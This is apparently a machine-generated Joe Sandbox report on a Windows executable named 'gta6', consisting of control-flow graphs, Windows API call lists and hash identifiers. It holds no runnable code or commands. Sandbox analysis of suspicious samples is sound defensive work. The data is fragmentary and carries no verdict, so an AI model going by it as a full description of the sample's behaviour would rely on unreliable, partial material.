8991->8989 8992->8987 8995 14000e036 SetFilePointer 8992->8995 8994->8992 8995->8987 8997 1400112e3 8996->8997 8998 1400112d0 8996->8998 8999 140011312 8997->8999 9000 1400112e9 RtlReAllocateHeap 8997->9000 9001 140011cb0 RtlAllocateHeap 8998->9001 9002 1400112de RtlLeaveCriticalSection 8999->9002 9003 14001132d RtlAllocateHeap 8999->9003 9000->8999 9001->9002 9002->8978 9003->9002 9006 140011200 9005->9006 9007 14001121f 9005->9007 9006->9007 9008 140011206 9006->9008 9012 140011c68 9007->9012 9010 140011213 memset 9008->9010 9011 14001122b RtlLeaveCriticalSection 9008->9011 9010->9011 9013 140011c74 HeapFree 9012->9013 9015 14001f820 9013->9015 9651 1400086d0 9652 1400086ee 9651->9652 9654 140008701 9651->9654 9653 140008710 CharLowerW CharLowerW 9653->9654 9655 14000873e 9653->9655 9654->9653 9654->9655 9295 140002853 9316 1400123e0 9295->9316 9299 14000286b 9328 1400121c0 GetLastError TlsGetValue SetLastError 9299->9328 9301 140002889 9329 140012450 9301->9329 9303 140002898 9334 1400121c0 GetLastError TlsGetValue SetLastError 9303->9334 9305 1400028a6 9335 1400121c0 GetLastError TlsGetValue SetLastError 9305->9335 9307 1400028ba 9336 14000c8e0 9307->9336 9311 1400028d4 9341 1400125d0 TlsGetValue 9311->9341 9313 1400028e5 9342 14000b574 9313->9342 9315 1400028fb 9317 1400123ed 9316->9317 9318 14001240f TlsGetValue 9316->9318 9319 140012060 5 API calls 9317->9319 9320 140002861 9318->9320 9321 140012420 9318->9321 9322 1400123f2 TlsGetValue 9319->9322 9327 1400121c0 GetLastError TlsGetValue SetLastError 9320->9327 9358 140012c50 RtlAllocateHeap RtlAllocateHeap TlsSetValue 9321->9358 9349 140016fb4 9322->9349 9325 140012425 TlsGetValue 9326 140016fb4 13 API calls 9325->9326 9326->9320 9327->9299 9328->9301 9330 140012477 9329->9330 9331 140012469 wcslen 9329->9331 9332 1400126d0 3 API calls 9330->9332 9331->9330 9333 140012485 9332->9333 9333->9303 9334->9305 9335->9307 9337 14000c8f0 9336->9337 9338 1400126d0 3 API calls 9337->9338 9339 1400028ca 9338->9339 9340 140012520 TlsGetValue 9339->9340 9340->9311 9341->9313 9359 14000be5c GetForegroundWindow 9342->9359 9345 14000bf44 7 API calls 9346 14000b5a3 MessageBoxW 9345->9346 9347 14000bf44 7 API calls 9346->9347 9348 14000b5bf 9347->9348 9348->9315 9350 140016fe2 TlsAlloc RtlInitializeCriticalSection 9349->9350 9351 140017001 TlsGetValue 9349->9351 9350->9351 9352 1400170d6 RtlAllocateHeap 9351->9352 9353 140017019 RtlAllocateHeap 9351->9353 9354 1400170ee 9352->9354 9353->9354 9355 140017039 RtlEnterCriticalSection 9353->9355 9354->9320 9356 140017051 7 API calls 9355->9356 9357 14001704e 9355->9357 9356->9352 9357->9356 9358->9325 9360 14000b596 9359->9360 9361 14000be76 GetWindowThreadProcessId GetCurrentProcessId 9359->9361 9360->9345 9361->9360 9656 14000c2d8 9661 14000c188 9656->9661 9659 1400126d0 3 API calls 9660 14000c30c 9659->9660 9665 140011044 TlsGetValue 9661->9665 9664 14000c1c5 9664->9659 9666 14000c1a9 GetCommandLineW 9665->9666 9667 14001106a RtlAllocateHeap TlsSetValue 9665->9667 9666->9664 9668 14001109c 9667->9668 9669 140016fb4 13 API calls 9668->9669 9669->9666 9918 1400031d9 9919 1400031dc 9918->9919 9920 140012360 HeapFree 9919->9920 9921 1400031eb 9920->9921 9922 14000c3dc GetEnvironmentVariableW 9923 14000c408 9922->9923 9924 1400126d0 3 API calls 9923->9924 9925 14000c413 GetEnvironmentVariableW 9924->9925 9926 140012fdd 9929 140012fe5 9926->9929 9927 140015060 3 API calls 9928 14001449c 9927->9928 9929->9927 9929->9928 9827 140017360 9828 1400173e8 9827->9828 9829 140017387 MultiByteToWideChar 9827->9829 9830 1400126d0 3 API calls 9828->9830 9829->9828 9833 1400173b9 9829->9833 9832 1400173f1 9830->9832 9834 1400126d0 3 API calls 9833->9834 9835 1400173c2 MultiByteToWideChar 9834->9835 9835->9832

      Control-flow Graph

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: LibraryPath$AddressAllocateFreeHeapLoadLongNameProcTempValue
      • String ID: GetLongPathNameW$Kernel32.DLL
      • API String ID: 1993255246-2943376620
      • Opcode ID: c3e4c02f6cb4c0a015bd45f3fcc7f186f913e40d0dd92e763cbbe5d307640fc6
      • Instruction ID: 230e630dded4efaa915c31c3904b5b857ecb3aa047886c8d585020238d201ac5
      • Opcode Fuzzy Hash: c3e4c02f6cb4c0a015bd45f3fcc7f186f913e40d0dd92e763cbbe5d307640fc6
      • Instruction Fuzzy Hash: 74116D3171074086EF159F27A9443A967A5FB8CFC0F481029FF4E4B7A5DE39C4518340
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: ExceptionHandlerVectored$Remove
      • String ID:
      • API String ID: 3670940754-0
      • Opcode ID: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
      • Instruction ID: 54ed52b0d94e107c171475cce83a86a7777a808cb3853d4771323e3d57a36066
      • Opcode Fuzzy Hash: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
      • Instruction Fuzzy Hash: 8AF0ED7061370485FE5BDB93B8987F472A0AB4C7C0F184029BB49076719F3C88A48348

      Control-flow Graph

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: CriticalCurrentSection$AllocateHeapProcessValue$AllocDuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
      • String ID:
      • API String ID: 2673290768-0
      • Opcode ID: aef90992288fd509fbd74998ffb1029e6b7b59a5f56d271f65cebbdd5f433d17
      • Instruction ID: 0ebcb89b5f496a055c7edd3f2936d7e00332f328880e18a7a0f049a68aa3c175
      • Opcode Fuzzy Hash: aef90992288fd509fbd74998ffb1029e6b7b59a5f56d271f65cebbdd5f433d17
      • Instruction Fuzzy Hash: 0641E172201B409AEB129F62E8447A977A0F78CBD5F484129EB4D0B774DF39C999D740

      Control-flow Graph

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: File$NameTemp$Heap$AllocateErrorLastPathValue$AttributesBackslashCreateDeleteDirectoryExtensionFreeRenamememcpywcslenwcsncpy
      • String ID:
      • API String ID: 1881527299-0
      • Opcode ID: 30cb002adb08c8c9ee0a6baba99c0a0f0998ecb4b16737804f1fb03ce3a8d9fe
      • Instruction ID: 77aa1fd205ec2d48eabb088ee49ef1dd4fb6b524f1726a3c9e39dbd98a5b5f3b
      • Opcode Fuzzy Hash: 30cb002adb08c8c9ee0a6baba99c0a0f0998ecb4b16737804f1fb03ce3a8d9fe
      • Instruction Fuzzy Hash: 138162FBE69644E5EA07B763BC46BED5220D3AD3D4F504410FF08062A3EE3995EA4B10

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 104 14000de50-14000de9e call 1400112a8 107 14000dea4-14000deb4 104->107 108 14000e098-14000e09b 104->108 109 14000deb6-14000dec7 107->109 110 14000defb-14000defe 107->110 111 14000e07f-14000e097 108->111 112 14000dec9 109->112 113 14000decd-14000def6 CreateFileW 109->113 114 14000df42-14000df46 110->114 115 14000df00-14000df11 110->115 112->113 116 14000dfbc-14000dfc0 113->116 119 14000dfb7 114->119 120 14000df48-14000df59 114->120 117 14000df13 115->117 118 14000df17-14000df40 CreateFileW 115->118 121 14000dfc6-14000dfc9 116->121 122 14000e05d-14000e06f call 1400111dc 116->122 117->118 118->116 119->116 123 14000df5b 120->123 124 14000df5f-14000df8b CreateFileW 120->124 121->122 125 14000dfcf-14000dfd8 121->125 130 14000e074-14000e07c 122->130 123->124 124->121 127 14000df8d-14000dfb5 CreateFileW 124->127 128 14000dff9 125->128 129 14000dfda-14000dfdf 125->129 127->116 132 14000dffd-14000e02d 128->132 129->128 131 14000dfe1-14000dff7 RtlAllocateHeap 129->131 130->111 131->132 133 14000e04d-14000e05b 132->133 134 14000e02f-14000e034 132->134 133->122 133->130 134->133 135 14000e036-14000e047 SetFilePointer 134->135 135->133
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: File$Create$CriticalSection$AllocateEnterHeapLeavePointer
      • String ID:
      • API String ID: 3319923023-0
      • Opcode ID: 3acf6fa9c56a0c7a834e2f73706e5fbcdc580a0c2c593d59e461b3465d2a83a2
      • Instruction ID: 19dccfeb25466122eda91520b9d3e1282c027ca6efa307134c14a125255dccfb
      • Opcode Fuzzy Hash: 3acf6fa9c56a0c7a834e2f73706e5fbcdc580a0c2c593d59e461b3465d2a83a2
      • Instruction Fuzzy Hash: CA51B1B261469086E761CF17F9007AA7690B39CBE4F04873AFF6A47BE4DB79C4419B10

      Control-flow Graph

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: CriticalSection$CloseCreateEnterHandleLeaveObjectSingleThreadWait
      • String ID:
      • API String ID: 458812214-0
      • Opcode ID: dccc955c77b5a6b17664b800404429e9a916fd3538430a1521d222f39eb64d12
      • Instruction ID: 37a7c27cb33ea643b241ae4d06e82751f63dd7a6f22fff0809f2f79c8fcd043f
      • Opcode Fuzzy Hash: dccc955c77b5a6b17664b800404429e9a916fd3538430a1521d222f39eb64d12
      • Instruction Fuzzy Hash: 5E21FD76204B0081EB06DB12E8943E973A4FB8CBC4F988126EB8D477B9DF39C906C300

      Control-flow Graph

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: CriticalSection$CloseEnterFreeHandleHeapLeaveUnregisterWait
      • String ID:
      • API String ID: 2482123561-0
      • Opcode ID: a7666325c2cc4be02206466af1cdb72a6e7212eec2e023cca2c657541dd83cd8
      • Instruction ID: 196df3400b90f2231c07c3d27c18431f6acaa00a9f37171cec9b4569f9552cf6
      • Opcode Fuzzy Hash: a7666325c2cc4be02206466af1cdb72a6e7212eec2e023cca2c657541dd83cd8
      • Instruction Fuzzy Hash: 9521D636205A5092EB169F63E9803A973A1F78CBC0F548425EB5E4BB75DF3AD862D340

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 164 14000593c-14000593e 165 140005945-140005954 164->165 165->165 166 140005956-140005979 call 1400123e0 165->166 169 14000597b-140005987 166->169 170 140005a39-140005a53 169->170 171 14000598d-140005a33 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 169->171 173 140005a55-140005a61 170->173 171->169 171->170 175 140005b13-140005b2d 173->175 176 140005a67-140005b0d call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 173->176 179 140005b2f-140005b3b 175->179 176->173 176->175 182 140005b41-140005be7 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 179->182 183 140005bed-140005c07 179->183 182->179 182->183 187 140005c09-140005c15 183->187 191 140005cc7-140005ce1 187->191 192 140005c1b-140005cc1 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 187->192 197 140005ce3-140005cef 191->197 192->187 192->191 202 140005da1-140005dbb 197->202 203 140005cf5-140005d91 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 197->203 209 140005dbd-140005dc9 202->209 324 140005d96-140005d9b 203->324 215 140005e7f-140005e99 209->215 216 140005dcf-140005e79 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 209->216 218 140005e9b-140005ea7 215->218 216->209 216->215 226 140005f5d-140005f77 218->226 227 140005ead-140005f57 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 218->227 236 140005f79-140005f85 226->236 227->218 227->226 245 14000603b-140006055 236->245 246 140005f8b-140006035 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 236->246 256 140006057-140006063 245->256 246->236 246->245 266 140006119-14000657b call 1400121c0 call 140012450 * 2 call 140012210 call 1400121c0 * 2 call 1400047e2 call 140012210 call 14000c2bc GetModuleHandleW call 1400121c0 * 4 call 140010ba0 call 1400125d0 call 140007dc0 call 140012210 call 1400121c0 * 4 call 140010ba0 call 1400125d0 call 140007dc0 call 140012210 call 140004134 call 1400121c0 * 2 call 140002c46 call 140006a58 call 140001e57 call 1400067aa call 1400121c0 * 2 call 14000ca70 call 1400049ea call 140012210 PathRemoveBackslashW call 140002bab call 1400121c0 * 3 call 140003cc9 call 140012520 call 1400125d0 call 14000c45c call 140006a58 call 1400121c0 call 140012450 * 2 call 140012210 call 1400121c0 * 2 call 1400026bb call 140012210 call 140004ee2 call 1400121c0 call 140012450 call 140012210 PathQuoteSpacesW call 1400121c0 call 140012450 * 3 call 140012210 PathQuoteSpacesW 256->266 267 140006069-140006113 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 256->267 466 1400065a1-1400065a6 call 140003ddc 266->466 467 14000657d-140006593 call 140007284 266->467 267->256 267->266 324->197 324->202 471 1400065ab-1400067a9 call 1400121c0 * 2 call 140012450 * 3 call 140012520 call 1400121c0 * 2 call 14000daa8 call 140012520 call 1400121c0 call 140012450 * 2 call 1400125d0 * 3 call 1400029c8 call 140006a58 call 140002930 call 140012360 * 10 466->471 470 140006598-14000659f 467->470 470->471
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: Value$HeapPath$AllocateCriticalErrorLastQuoteSectionSpaces$BackslashCharCreateEnterEnvironmentFileFreeHandleLeaveModuleNameRemoveTempThreadUpperVariablewcslen
      • String ID:
      • API String ID: 116240943-0
      • Opcode ID: 694b1c19e8755626ce23e73af158c886c1e20011c5824741ac95cd017688f4b7
      • Instruction ID: 8b331e692c67017886d6c7239b17c9f9d27d3c51ffaf72a1bb59c68ee6c0545e
      • Opcode Fuzzy Hash: 694b1c19e8755626ce23e73af158c886c1e20011c5824741ac95cd017688f4b7
      • Instruction Fuzzy Hash: 83723BB6E25548D6EA16B7B7B8877E91220A3AD394F500411FF4C0B363EE39C5F64B10

      Control-flow Graph

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: FilePointermemcpy
      • String ID:
      • API String ID: 1104741977-0
      • Opcode ID: d3ec28a03912e6d80b261c35e196ed703beb3e203bb26ae9a29097b16b2476ce
      • Instruction ID: b9f44d82ba4cb6c24f152d63ce96d8852f082d92484b54d7365d071901ec84b9
      • Opcode Fuzzy Hash: d3ec28a03912e6d80b261c35e196ed703beb3e203bb26ae9a29097b16b2476ce
      • Instruction Fuzzy Hash: 7541837770468086DB01CF7AF1402ADF7A4EB98BD9F084426EF4C43BA5DA39C591CB50

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 547 1400126d0-1400126f2 TlsGetValue 548 1400126f4-1400126fc 547->548 549 140012700-14001272b 547->549 548->549 550 140012772-14001277f 549->550 551 14001272d-140012770 RtlReAllocateHeap 549->551 552 1400127d0-140012802 550->552 553 140012781-140012789 550->553 551->552 554 140012793-1400127cd RtlReAllocateHeap 553->554 555 14001278b 553->555 554->552 555->554
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: AllocateHeap$Value
      • String ID:
      • API String ID: 2497967046-0
      • Opcode ID: 988988ada6dc82bff9e9c7669f10d32680ca5bffd2b02ccc7cf7ef26e6a306a8
      • Instruction ID: 7cab8ebf5e8be7cca61280ad2f22e4d1c3948fe97e6d3aaf46f0ca18481b9e55
      • Opcode Fuzzy Hash: 988988ada6dc82bff9e9c7669f10d32680ca5bffd2b02ccc7cf7ef26e6a306a8
      • Instruction Fuzzy Hash: E7317336609B4486DB21CB5AE49035AB7A0F7CCBE8F144216EB8D47B78DF79C691CB40

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 556 14000e3f0-14000e404 557 14000e4f3-14000e4fd 556->557 558 14000e40a-14000e40e 556->558 558->557 559 14000e414-14000e418 558->559 560 14000e483-14000e4a6 call 14000e770 559->560 561 14000e41a-14000e423 559->561 569 14000e4a8-14000e4b5 560->569 570 14000e4ee 560->570 562 14000e451-14000e45b 561->562 563 14000e425 561->563 562->562 566 14000e45d-14000e482 WriteFile 562->566 565 14000e430-14000e43a 563->565 565->565 568 14000e43c-14000e450 call 14000e620 565->568 572 14000e4c5-14000e4d6 WriteFile 569->572 573 14000e4b7-14000e4ba call 14000e620 569->573 570->557 574 14000e4dc-14000e4e8 HeapFree 572->574 577 14000e4bf-14000e4c3 573->577 574->570 577->574
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: FileWrite$FreeHeap
      • String ID:
      • API String ID: 74418370-0
      • Opcode ID: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
      • Instruction ID: 9d08b72cfe526555b527e3d6fc60fa1eae748afb3cf0625e1a419d858907832f
      • Opcode Fuzzy Hash: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
      • Instruction Fuzzy Hash: 43317EB2205A8082EB22DF16E0453A9B7B0F789BD4F548515EB59577F4DF3EC488CB00

      Control-flow Graph

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: AllocateHeap$Value
      • String ID:
      • API String ID: 2497967046-0
      • Opcode ID: 30ed22d9c32a89c2cfd42ea85ebcc15196c91459ae3e4d92826612402d9637be
      • Instruction ID: c44eb9ef2cf98d3488e4d96c7e244cbf8e5b64558ad0ce04898d2a75112beb9a
      • Opcode Fuzzy Hash: 30ed22d9c32a89c2cfd42ea85ebcc15196c91459ae3e4d92826612402d9637be
      • Instruction Fuzzy Hash: 1521A336609B40C6DA25CB5AE89136AB7A1F7CDBD4F108126EB8D87B38DF3DC5518B00

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 584 14000d914-14000d922 585 14000d924-14000d95a wcsncpy wcslen 584->585 586 14000d99e 584->586 588 14000d98a-14000d99c CreateDirectoryW 585->588 589 14000d95c-14000d96b 585->589 587 14000d9a0-14000d9a8 586->587 588->587 589->588 590 14000d96d-14000d97b 589->590 590->588 591 14000d97d-14000d988 590->591 591->588 591->589
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: CreateDirectorywcslenwcsncpy
      • String ID:
      • API String ID: 961886536-0
      • Opcode ID: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
      • Instruction ID: 5f5e6732187473c7e9a992da28a106256b0abf82a063e4d7cd37b44a9c7c83f6
      • Opcode Fuzzy Hash: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
      • Instruction Fuzzy Hash: 100188A621264191EF72DB65E0643E9B350F78C7C4F804523FB8D036A8EE3DC645CB14

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 592 14000b538-14000b573 memset 00007FFB1B7A5550 CoInitialize
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: 00007A5550Initializememset
      • String ID:
      • API String ID: 1902644400-0
      • Opcode ID: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
      • Instruction ID: 449a974473b47bcf77cc2e9d1d873e7016711834fb404a36d393ff203d460c1f
      • Opcode Fuzzy Hash: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
      • Instruction Fuzzy Hash: E0E0E27263658092E785EB22E8857AEB260FB88748FC06105F38B469A5CF3DC659CF00

      Control-flow Graph

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
      • Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_140000000_gta6.jbxd
      Similarity
      • API ID: CodeExitProcess
      • String ID: open
      • API String ID: 3861947596-2758837156
      • Opcode ID: 88cc45060d987c4e95335cc00aeb877f29fe35eccabe24fc030c7400d8127be6
      • Instruction ID: 9a8e33d82e51c75021cc1a1bc422673ad63e4121514530fd256563005765fdb1
      • Opcode Fuzzy Hash: 88cc45060d987c4e95335cc00aeb877f29fe35eccabe24fc030c7400d8127be6
      • Instruction Fuzzy Hash: 6C315E73A19A84D9DA619B6AF8417EE6364F388784F404415FF8D07B6ADF3CC2958B40

      Control-flow Graph

      APIs
        • Part of subcall function 0000000140012060: HeapCreate.KERNEL32 ref: 000000014001206E
        • Part of subcall function 0000000140012060: TlsAlloc.KERNEL32 ref: 000000014001207B
        • Part of subcall function 000000014000C980: HeapCreate.KERNEL32 ref: 000000014000C98E
        • Part of subcall function 000000014000B538: memset.MSVCRT ref: 000000014000B547
        • Part of subcall function 000000014000B538: 00007FFB1B7A5550.COMCTL32 ref: 000000014000B561
        • Part of subcall function 000000014000B538: CoInitialize.OLE32 ref: 000000014000B569
        • Part of subcall function 00000001400120D0: RtlAllocateHeap.NTDLL ref: 0000000140012123
        • Part of subcall function 000000014000CCD8: RtlAllocateHeap.NTDLL ref: 000000014000CD11
        • Part of subcall function 000000014000CCD8: RtlAllocateHeap.NTDLL ref: 000000014000CD42
        • Part of subcall function 000000014000CCD8: RtlAllocateHeap.NTDLL ref: 000000014000CDB2
        • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D56E
        • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D58F
        • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D5A1
        • Part of subcall function 000000014000D444: RtlAllocateHeap.NTDLL ref: 000000014000D476
        • Part of subcall function 000000014000D444: RtlAllocateHeap.NTDLL ref: 000000014000D491
        • Part of subcall function 0000000140011D30: RtlAllocateHeap.NTDLL ref: 0000000140011D82
        • Part of subcall function 0000000140011D30: memset.MSVCRT ref: 0000000140011DB6
        • Part of subcall function 00000001400120D0: RtlReAllocateHeap.NTDLL ref: 0000000140012151
        • Part of subcall function 00000001400120D0: HeapFree.KERNEL32 ref: 0000000140012194
        • Part of subcall function 000000014000C4D0: RtlRemoveVectoredExceptionHandler.NTDLL ref: 000000014000C8A5
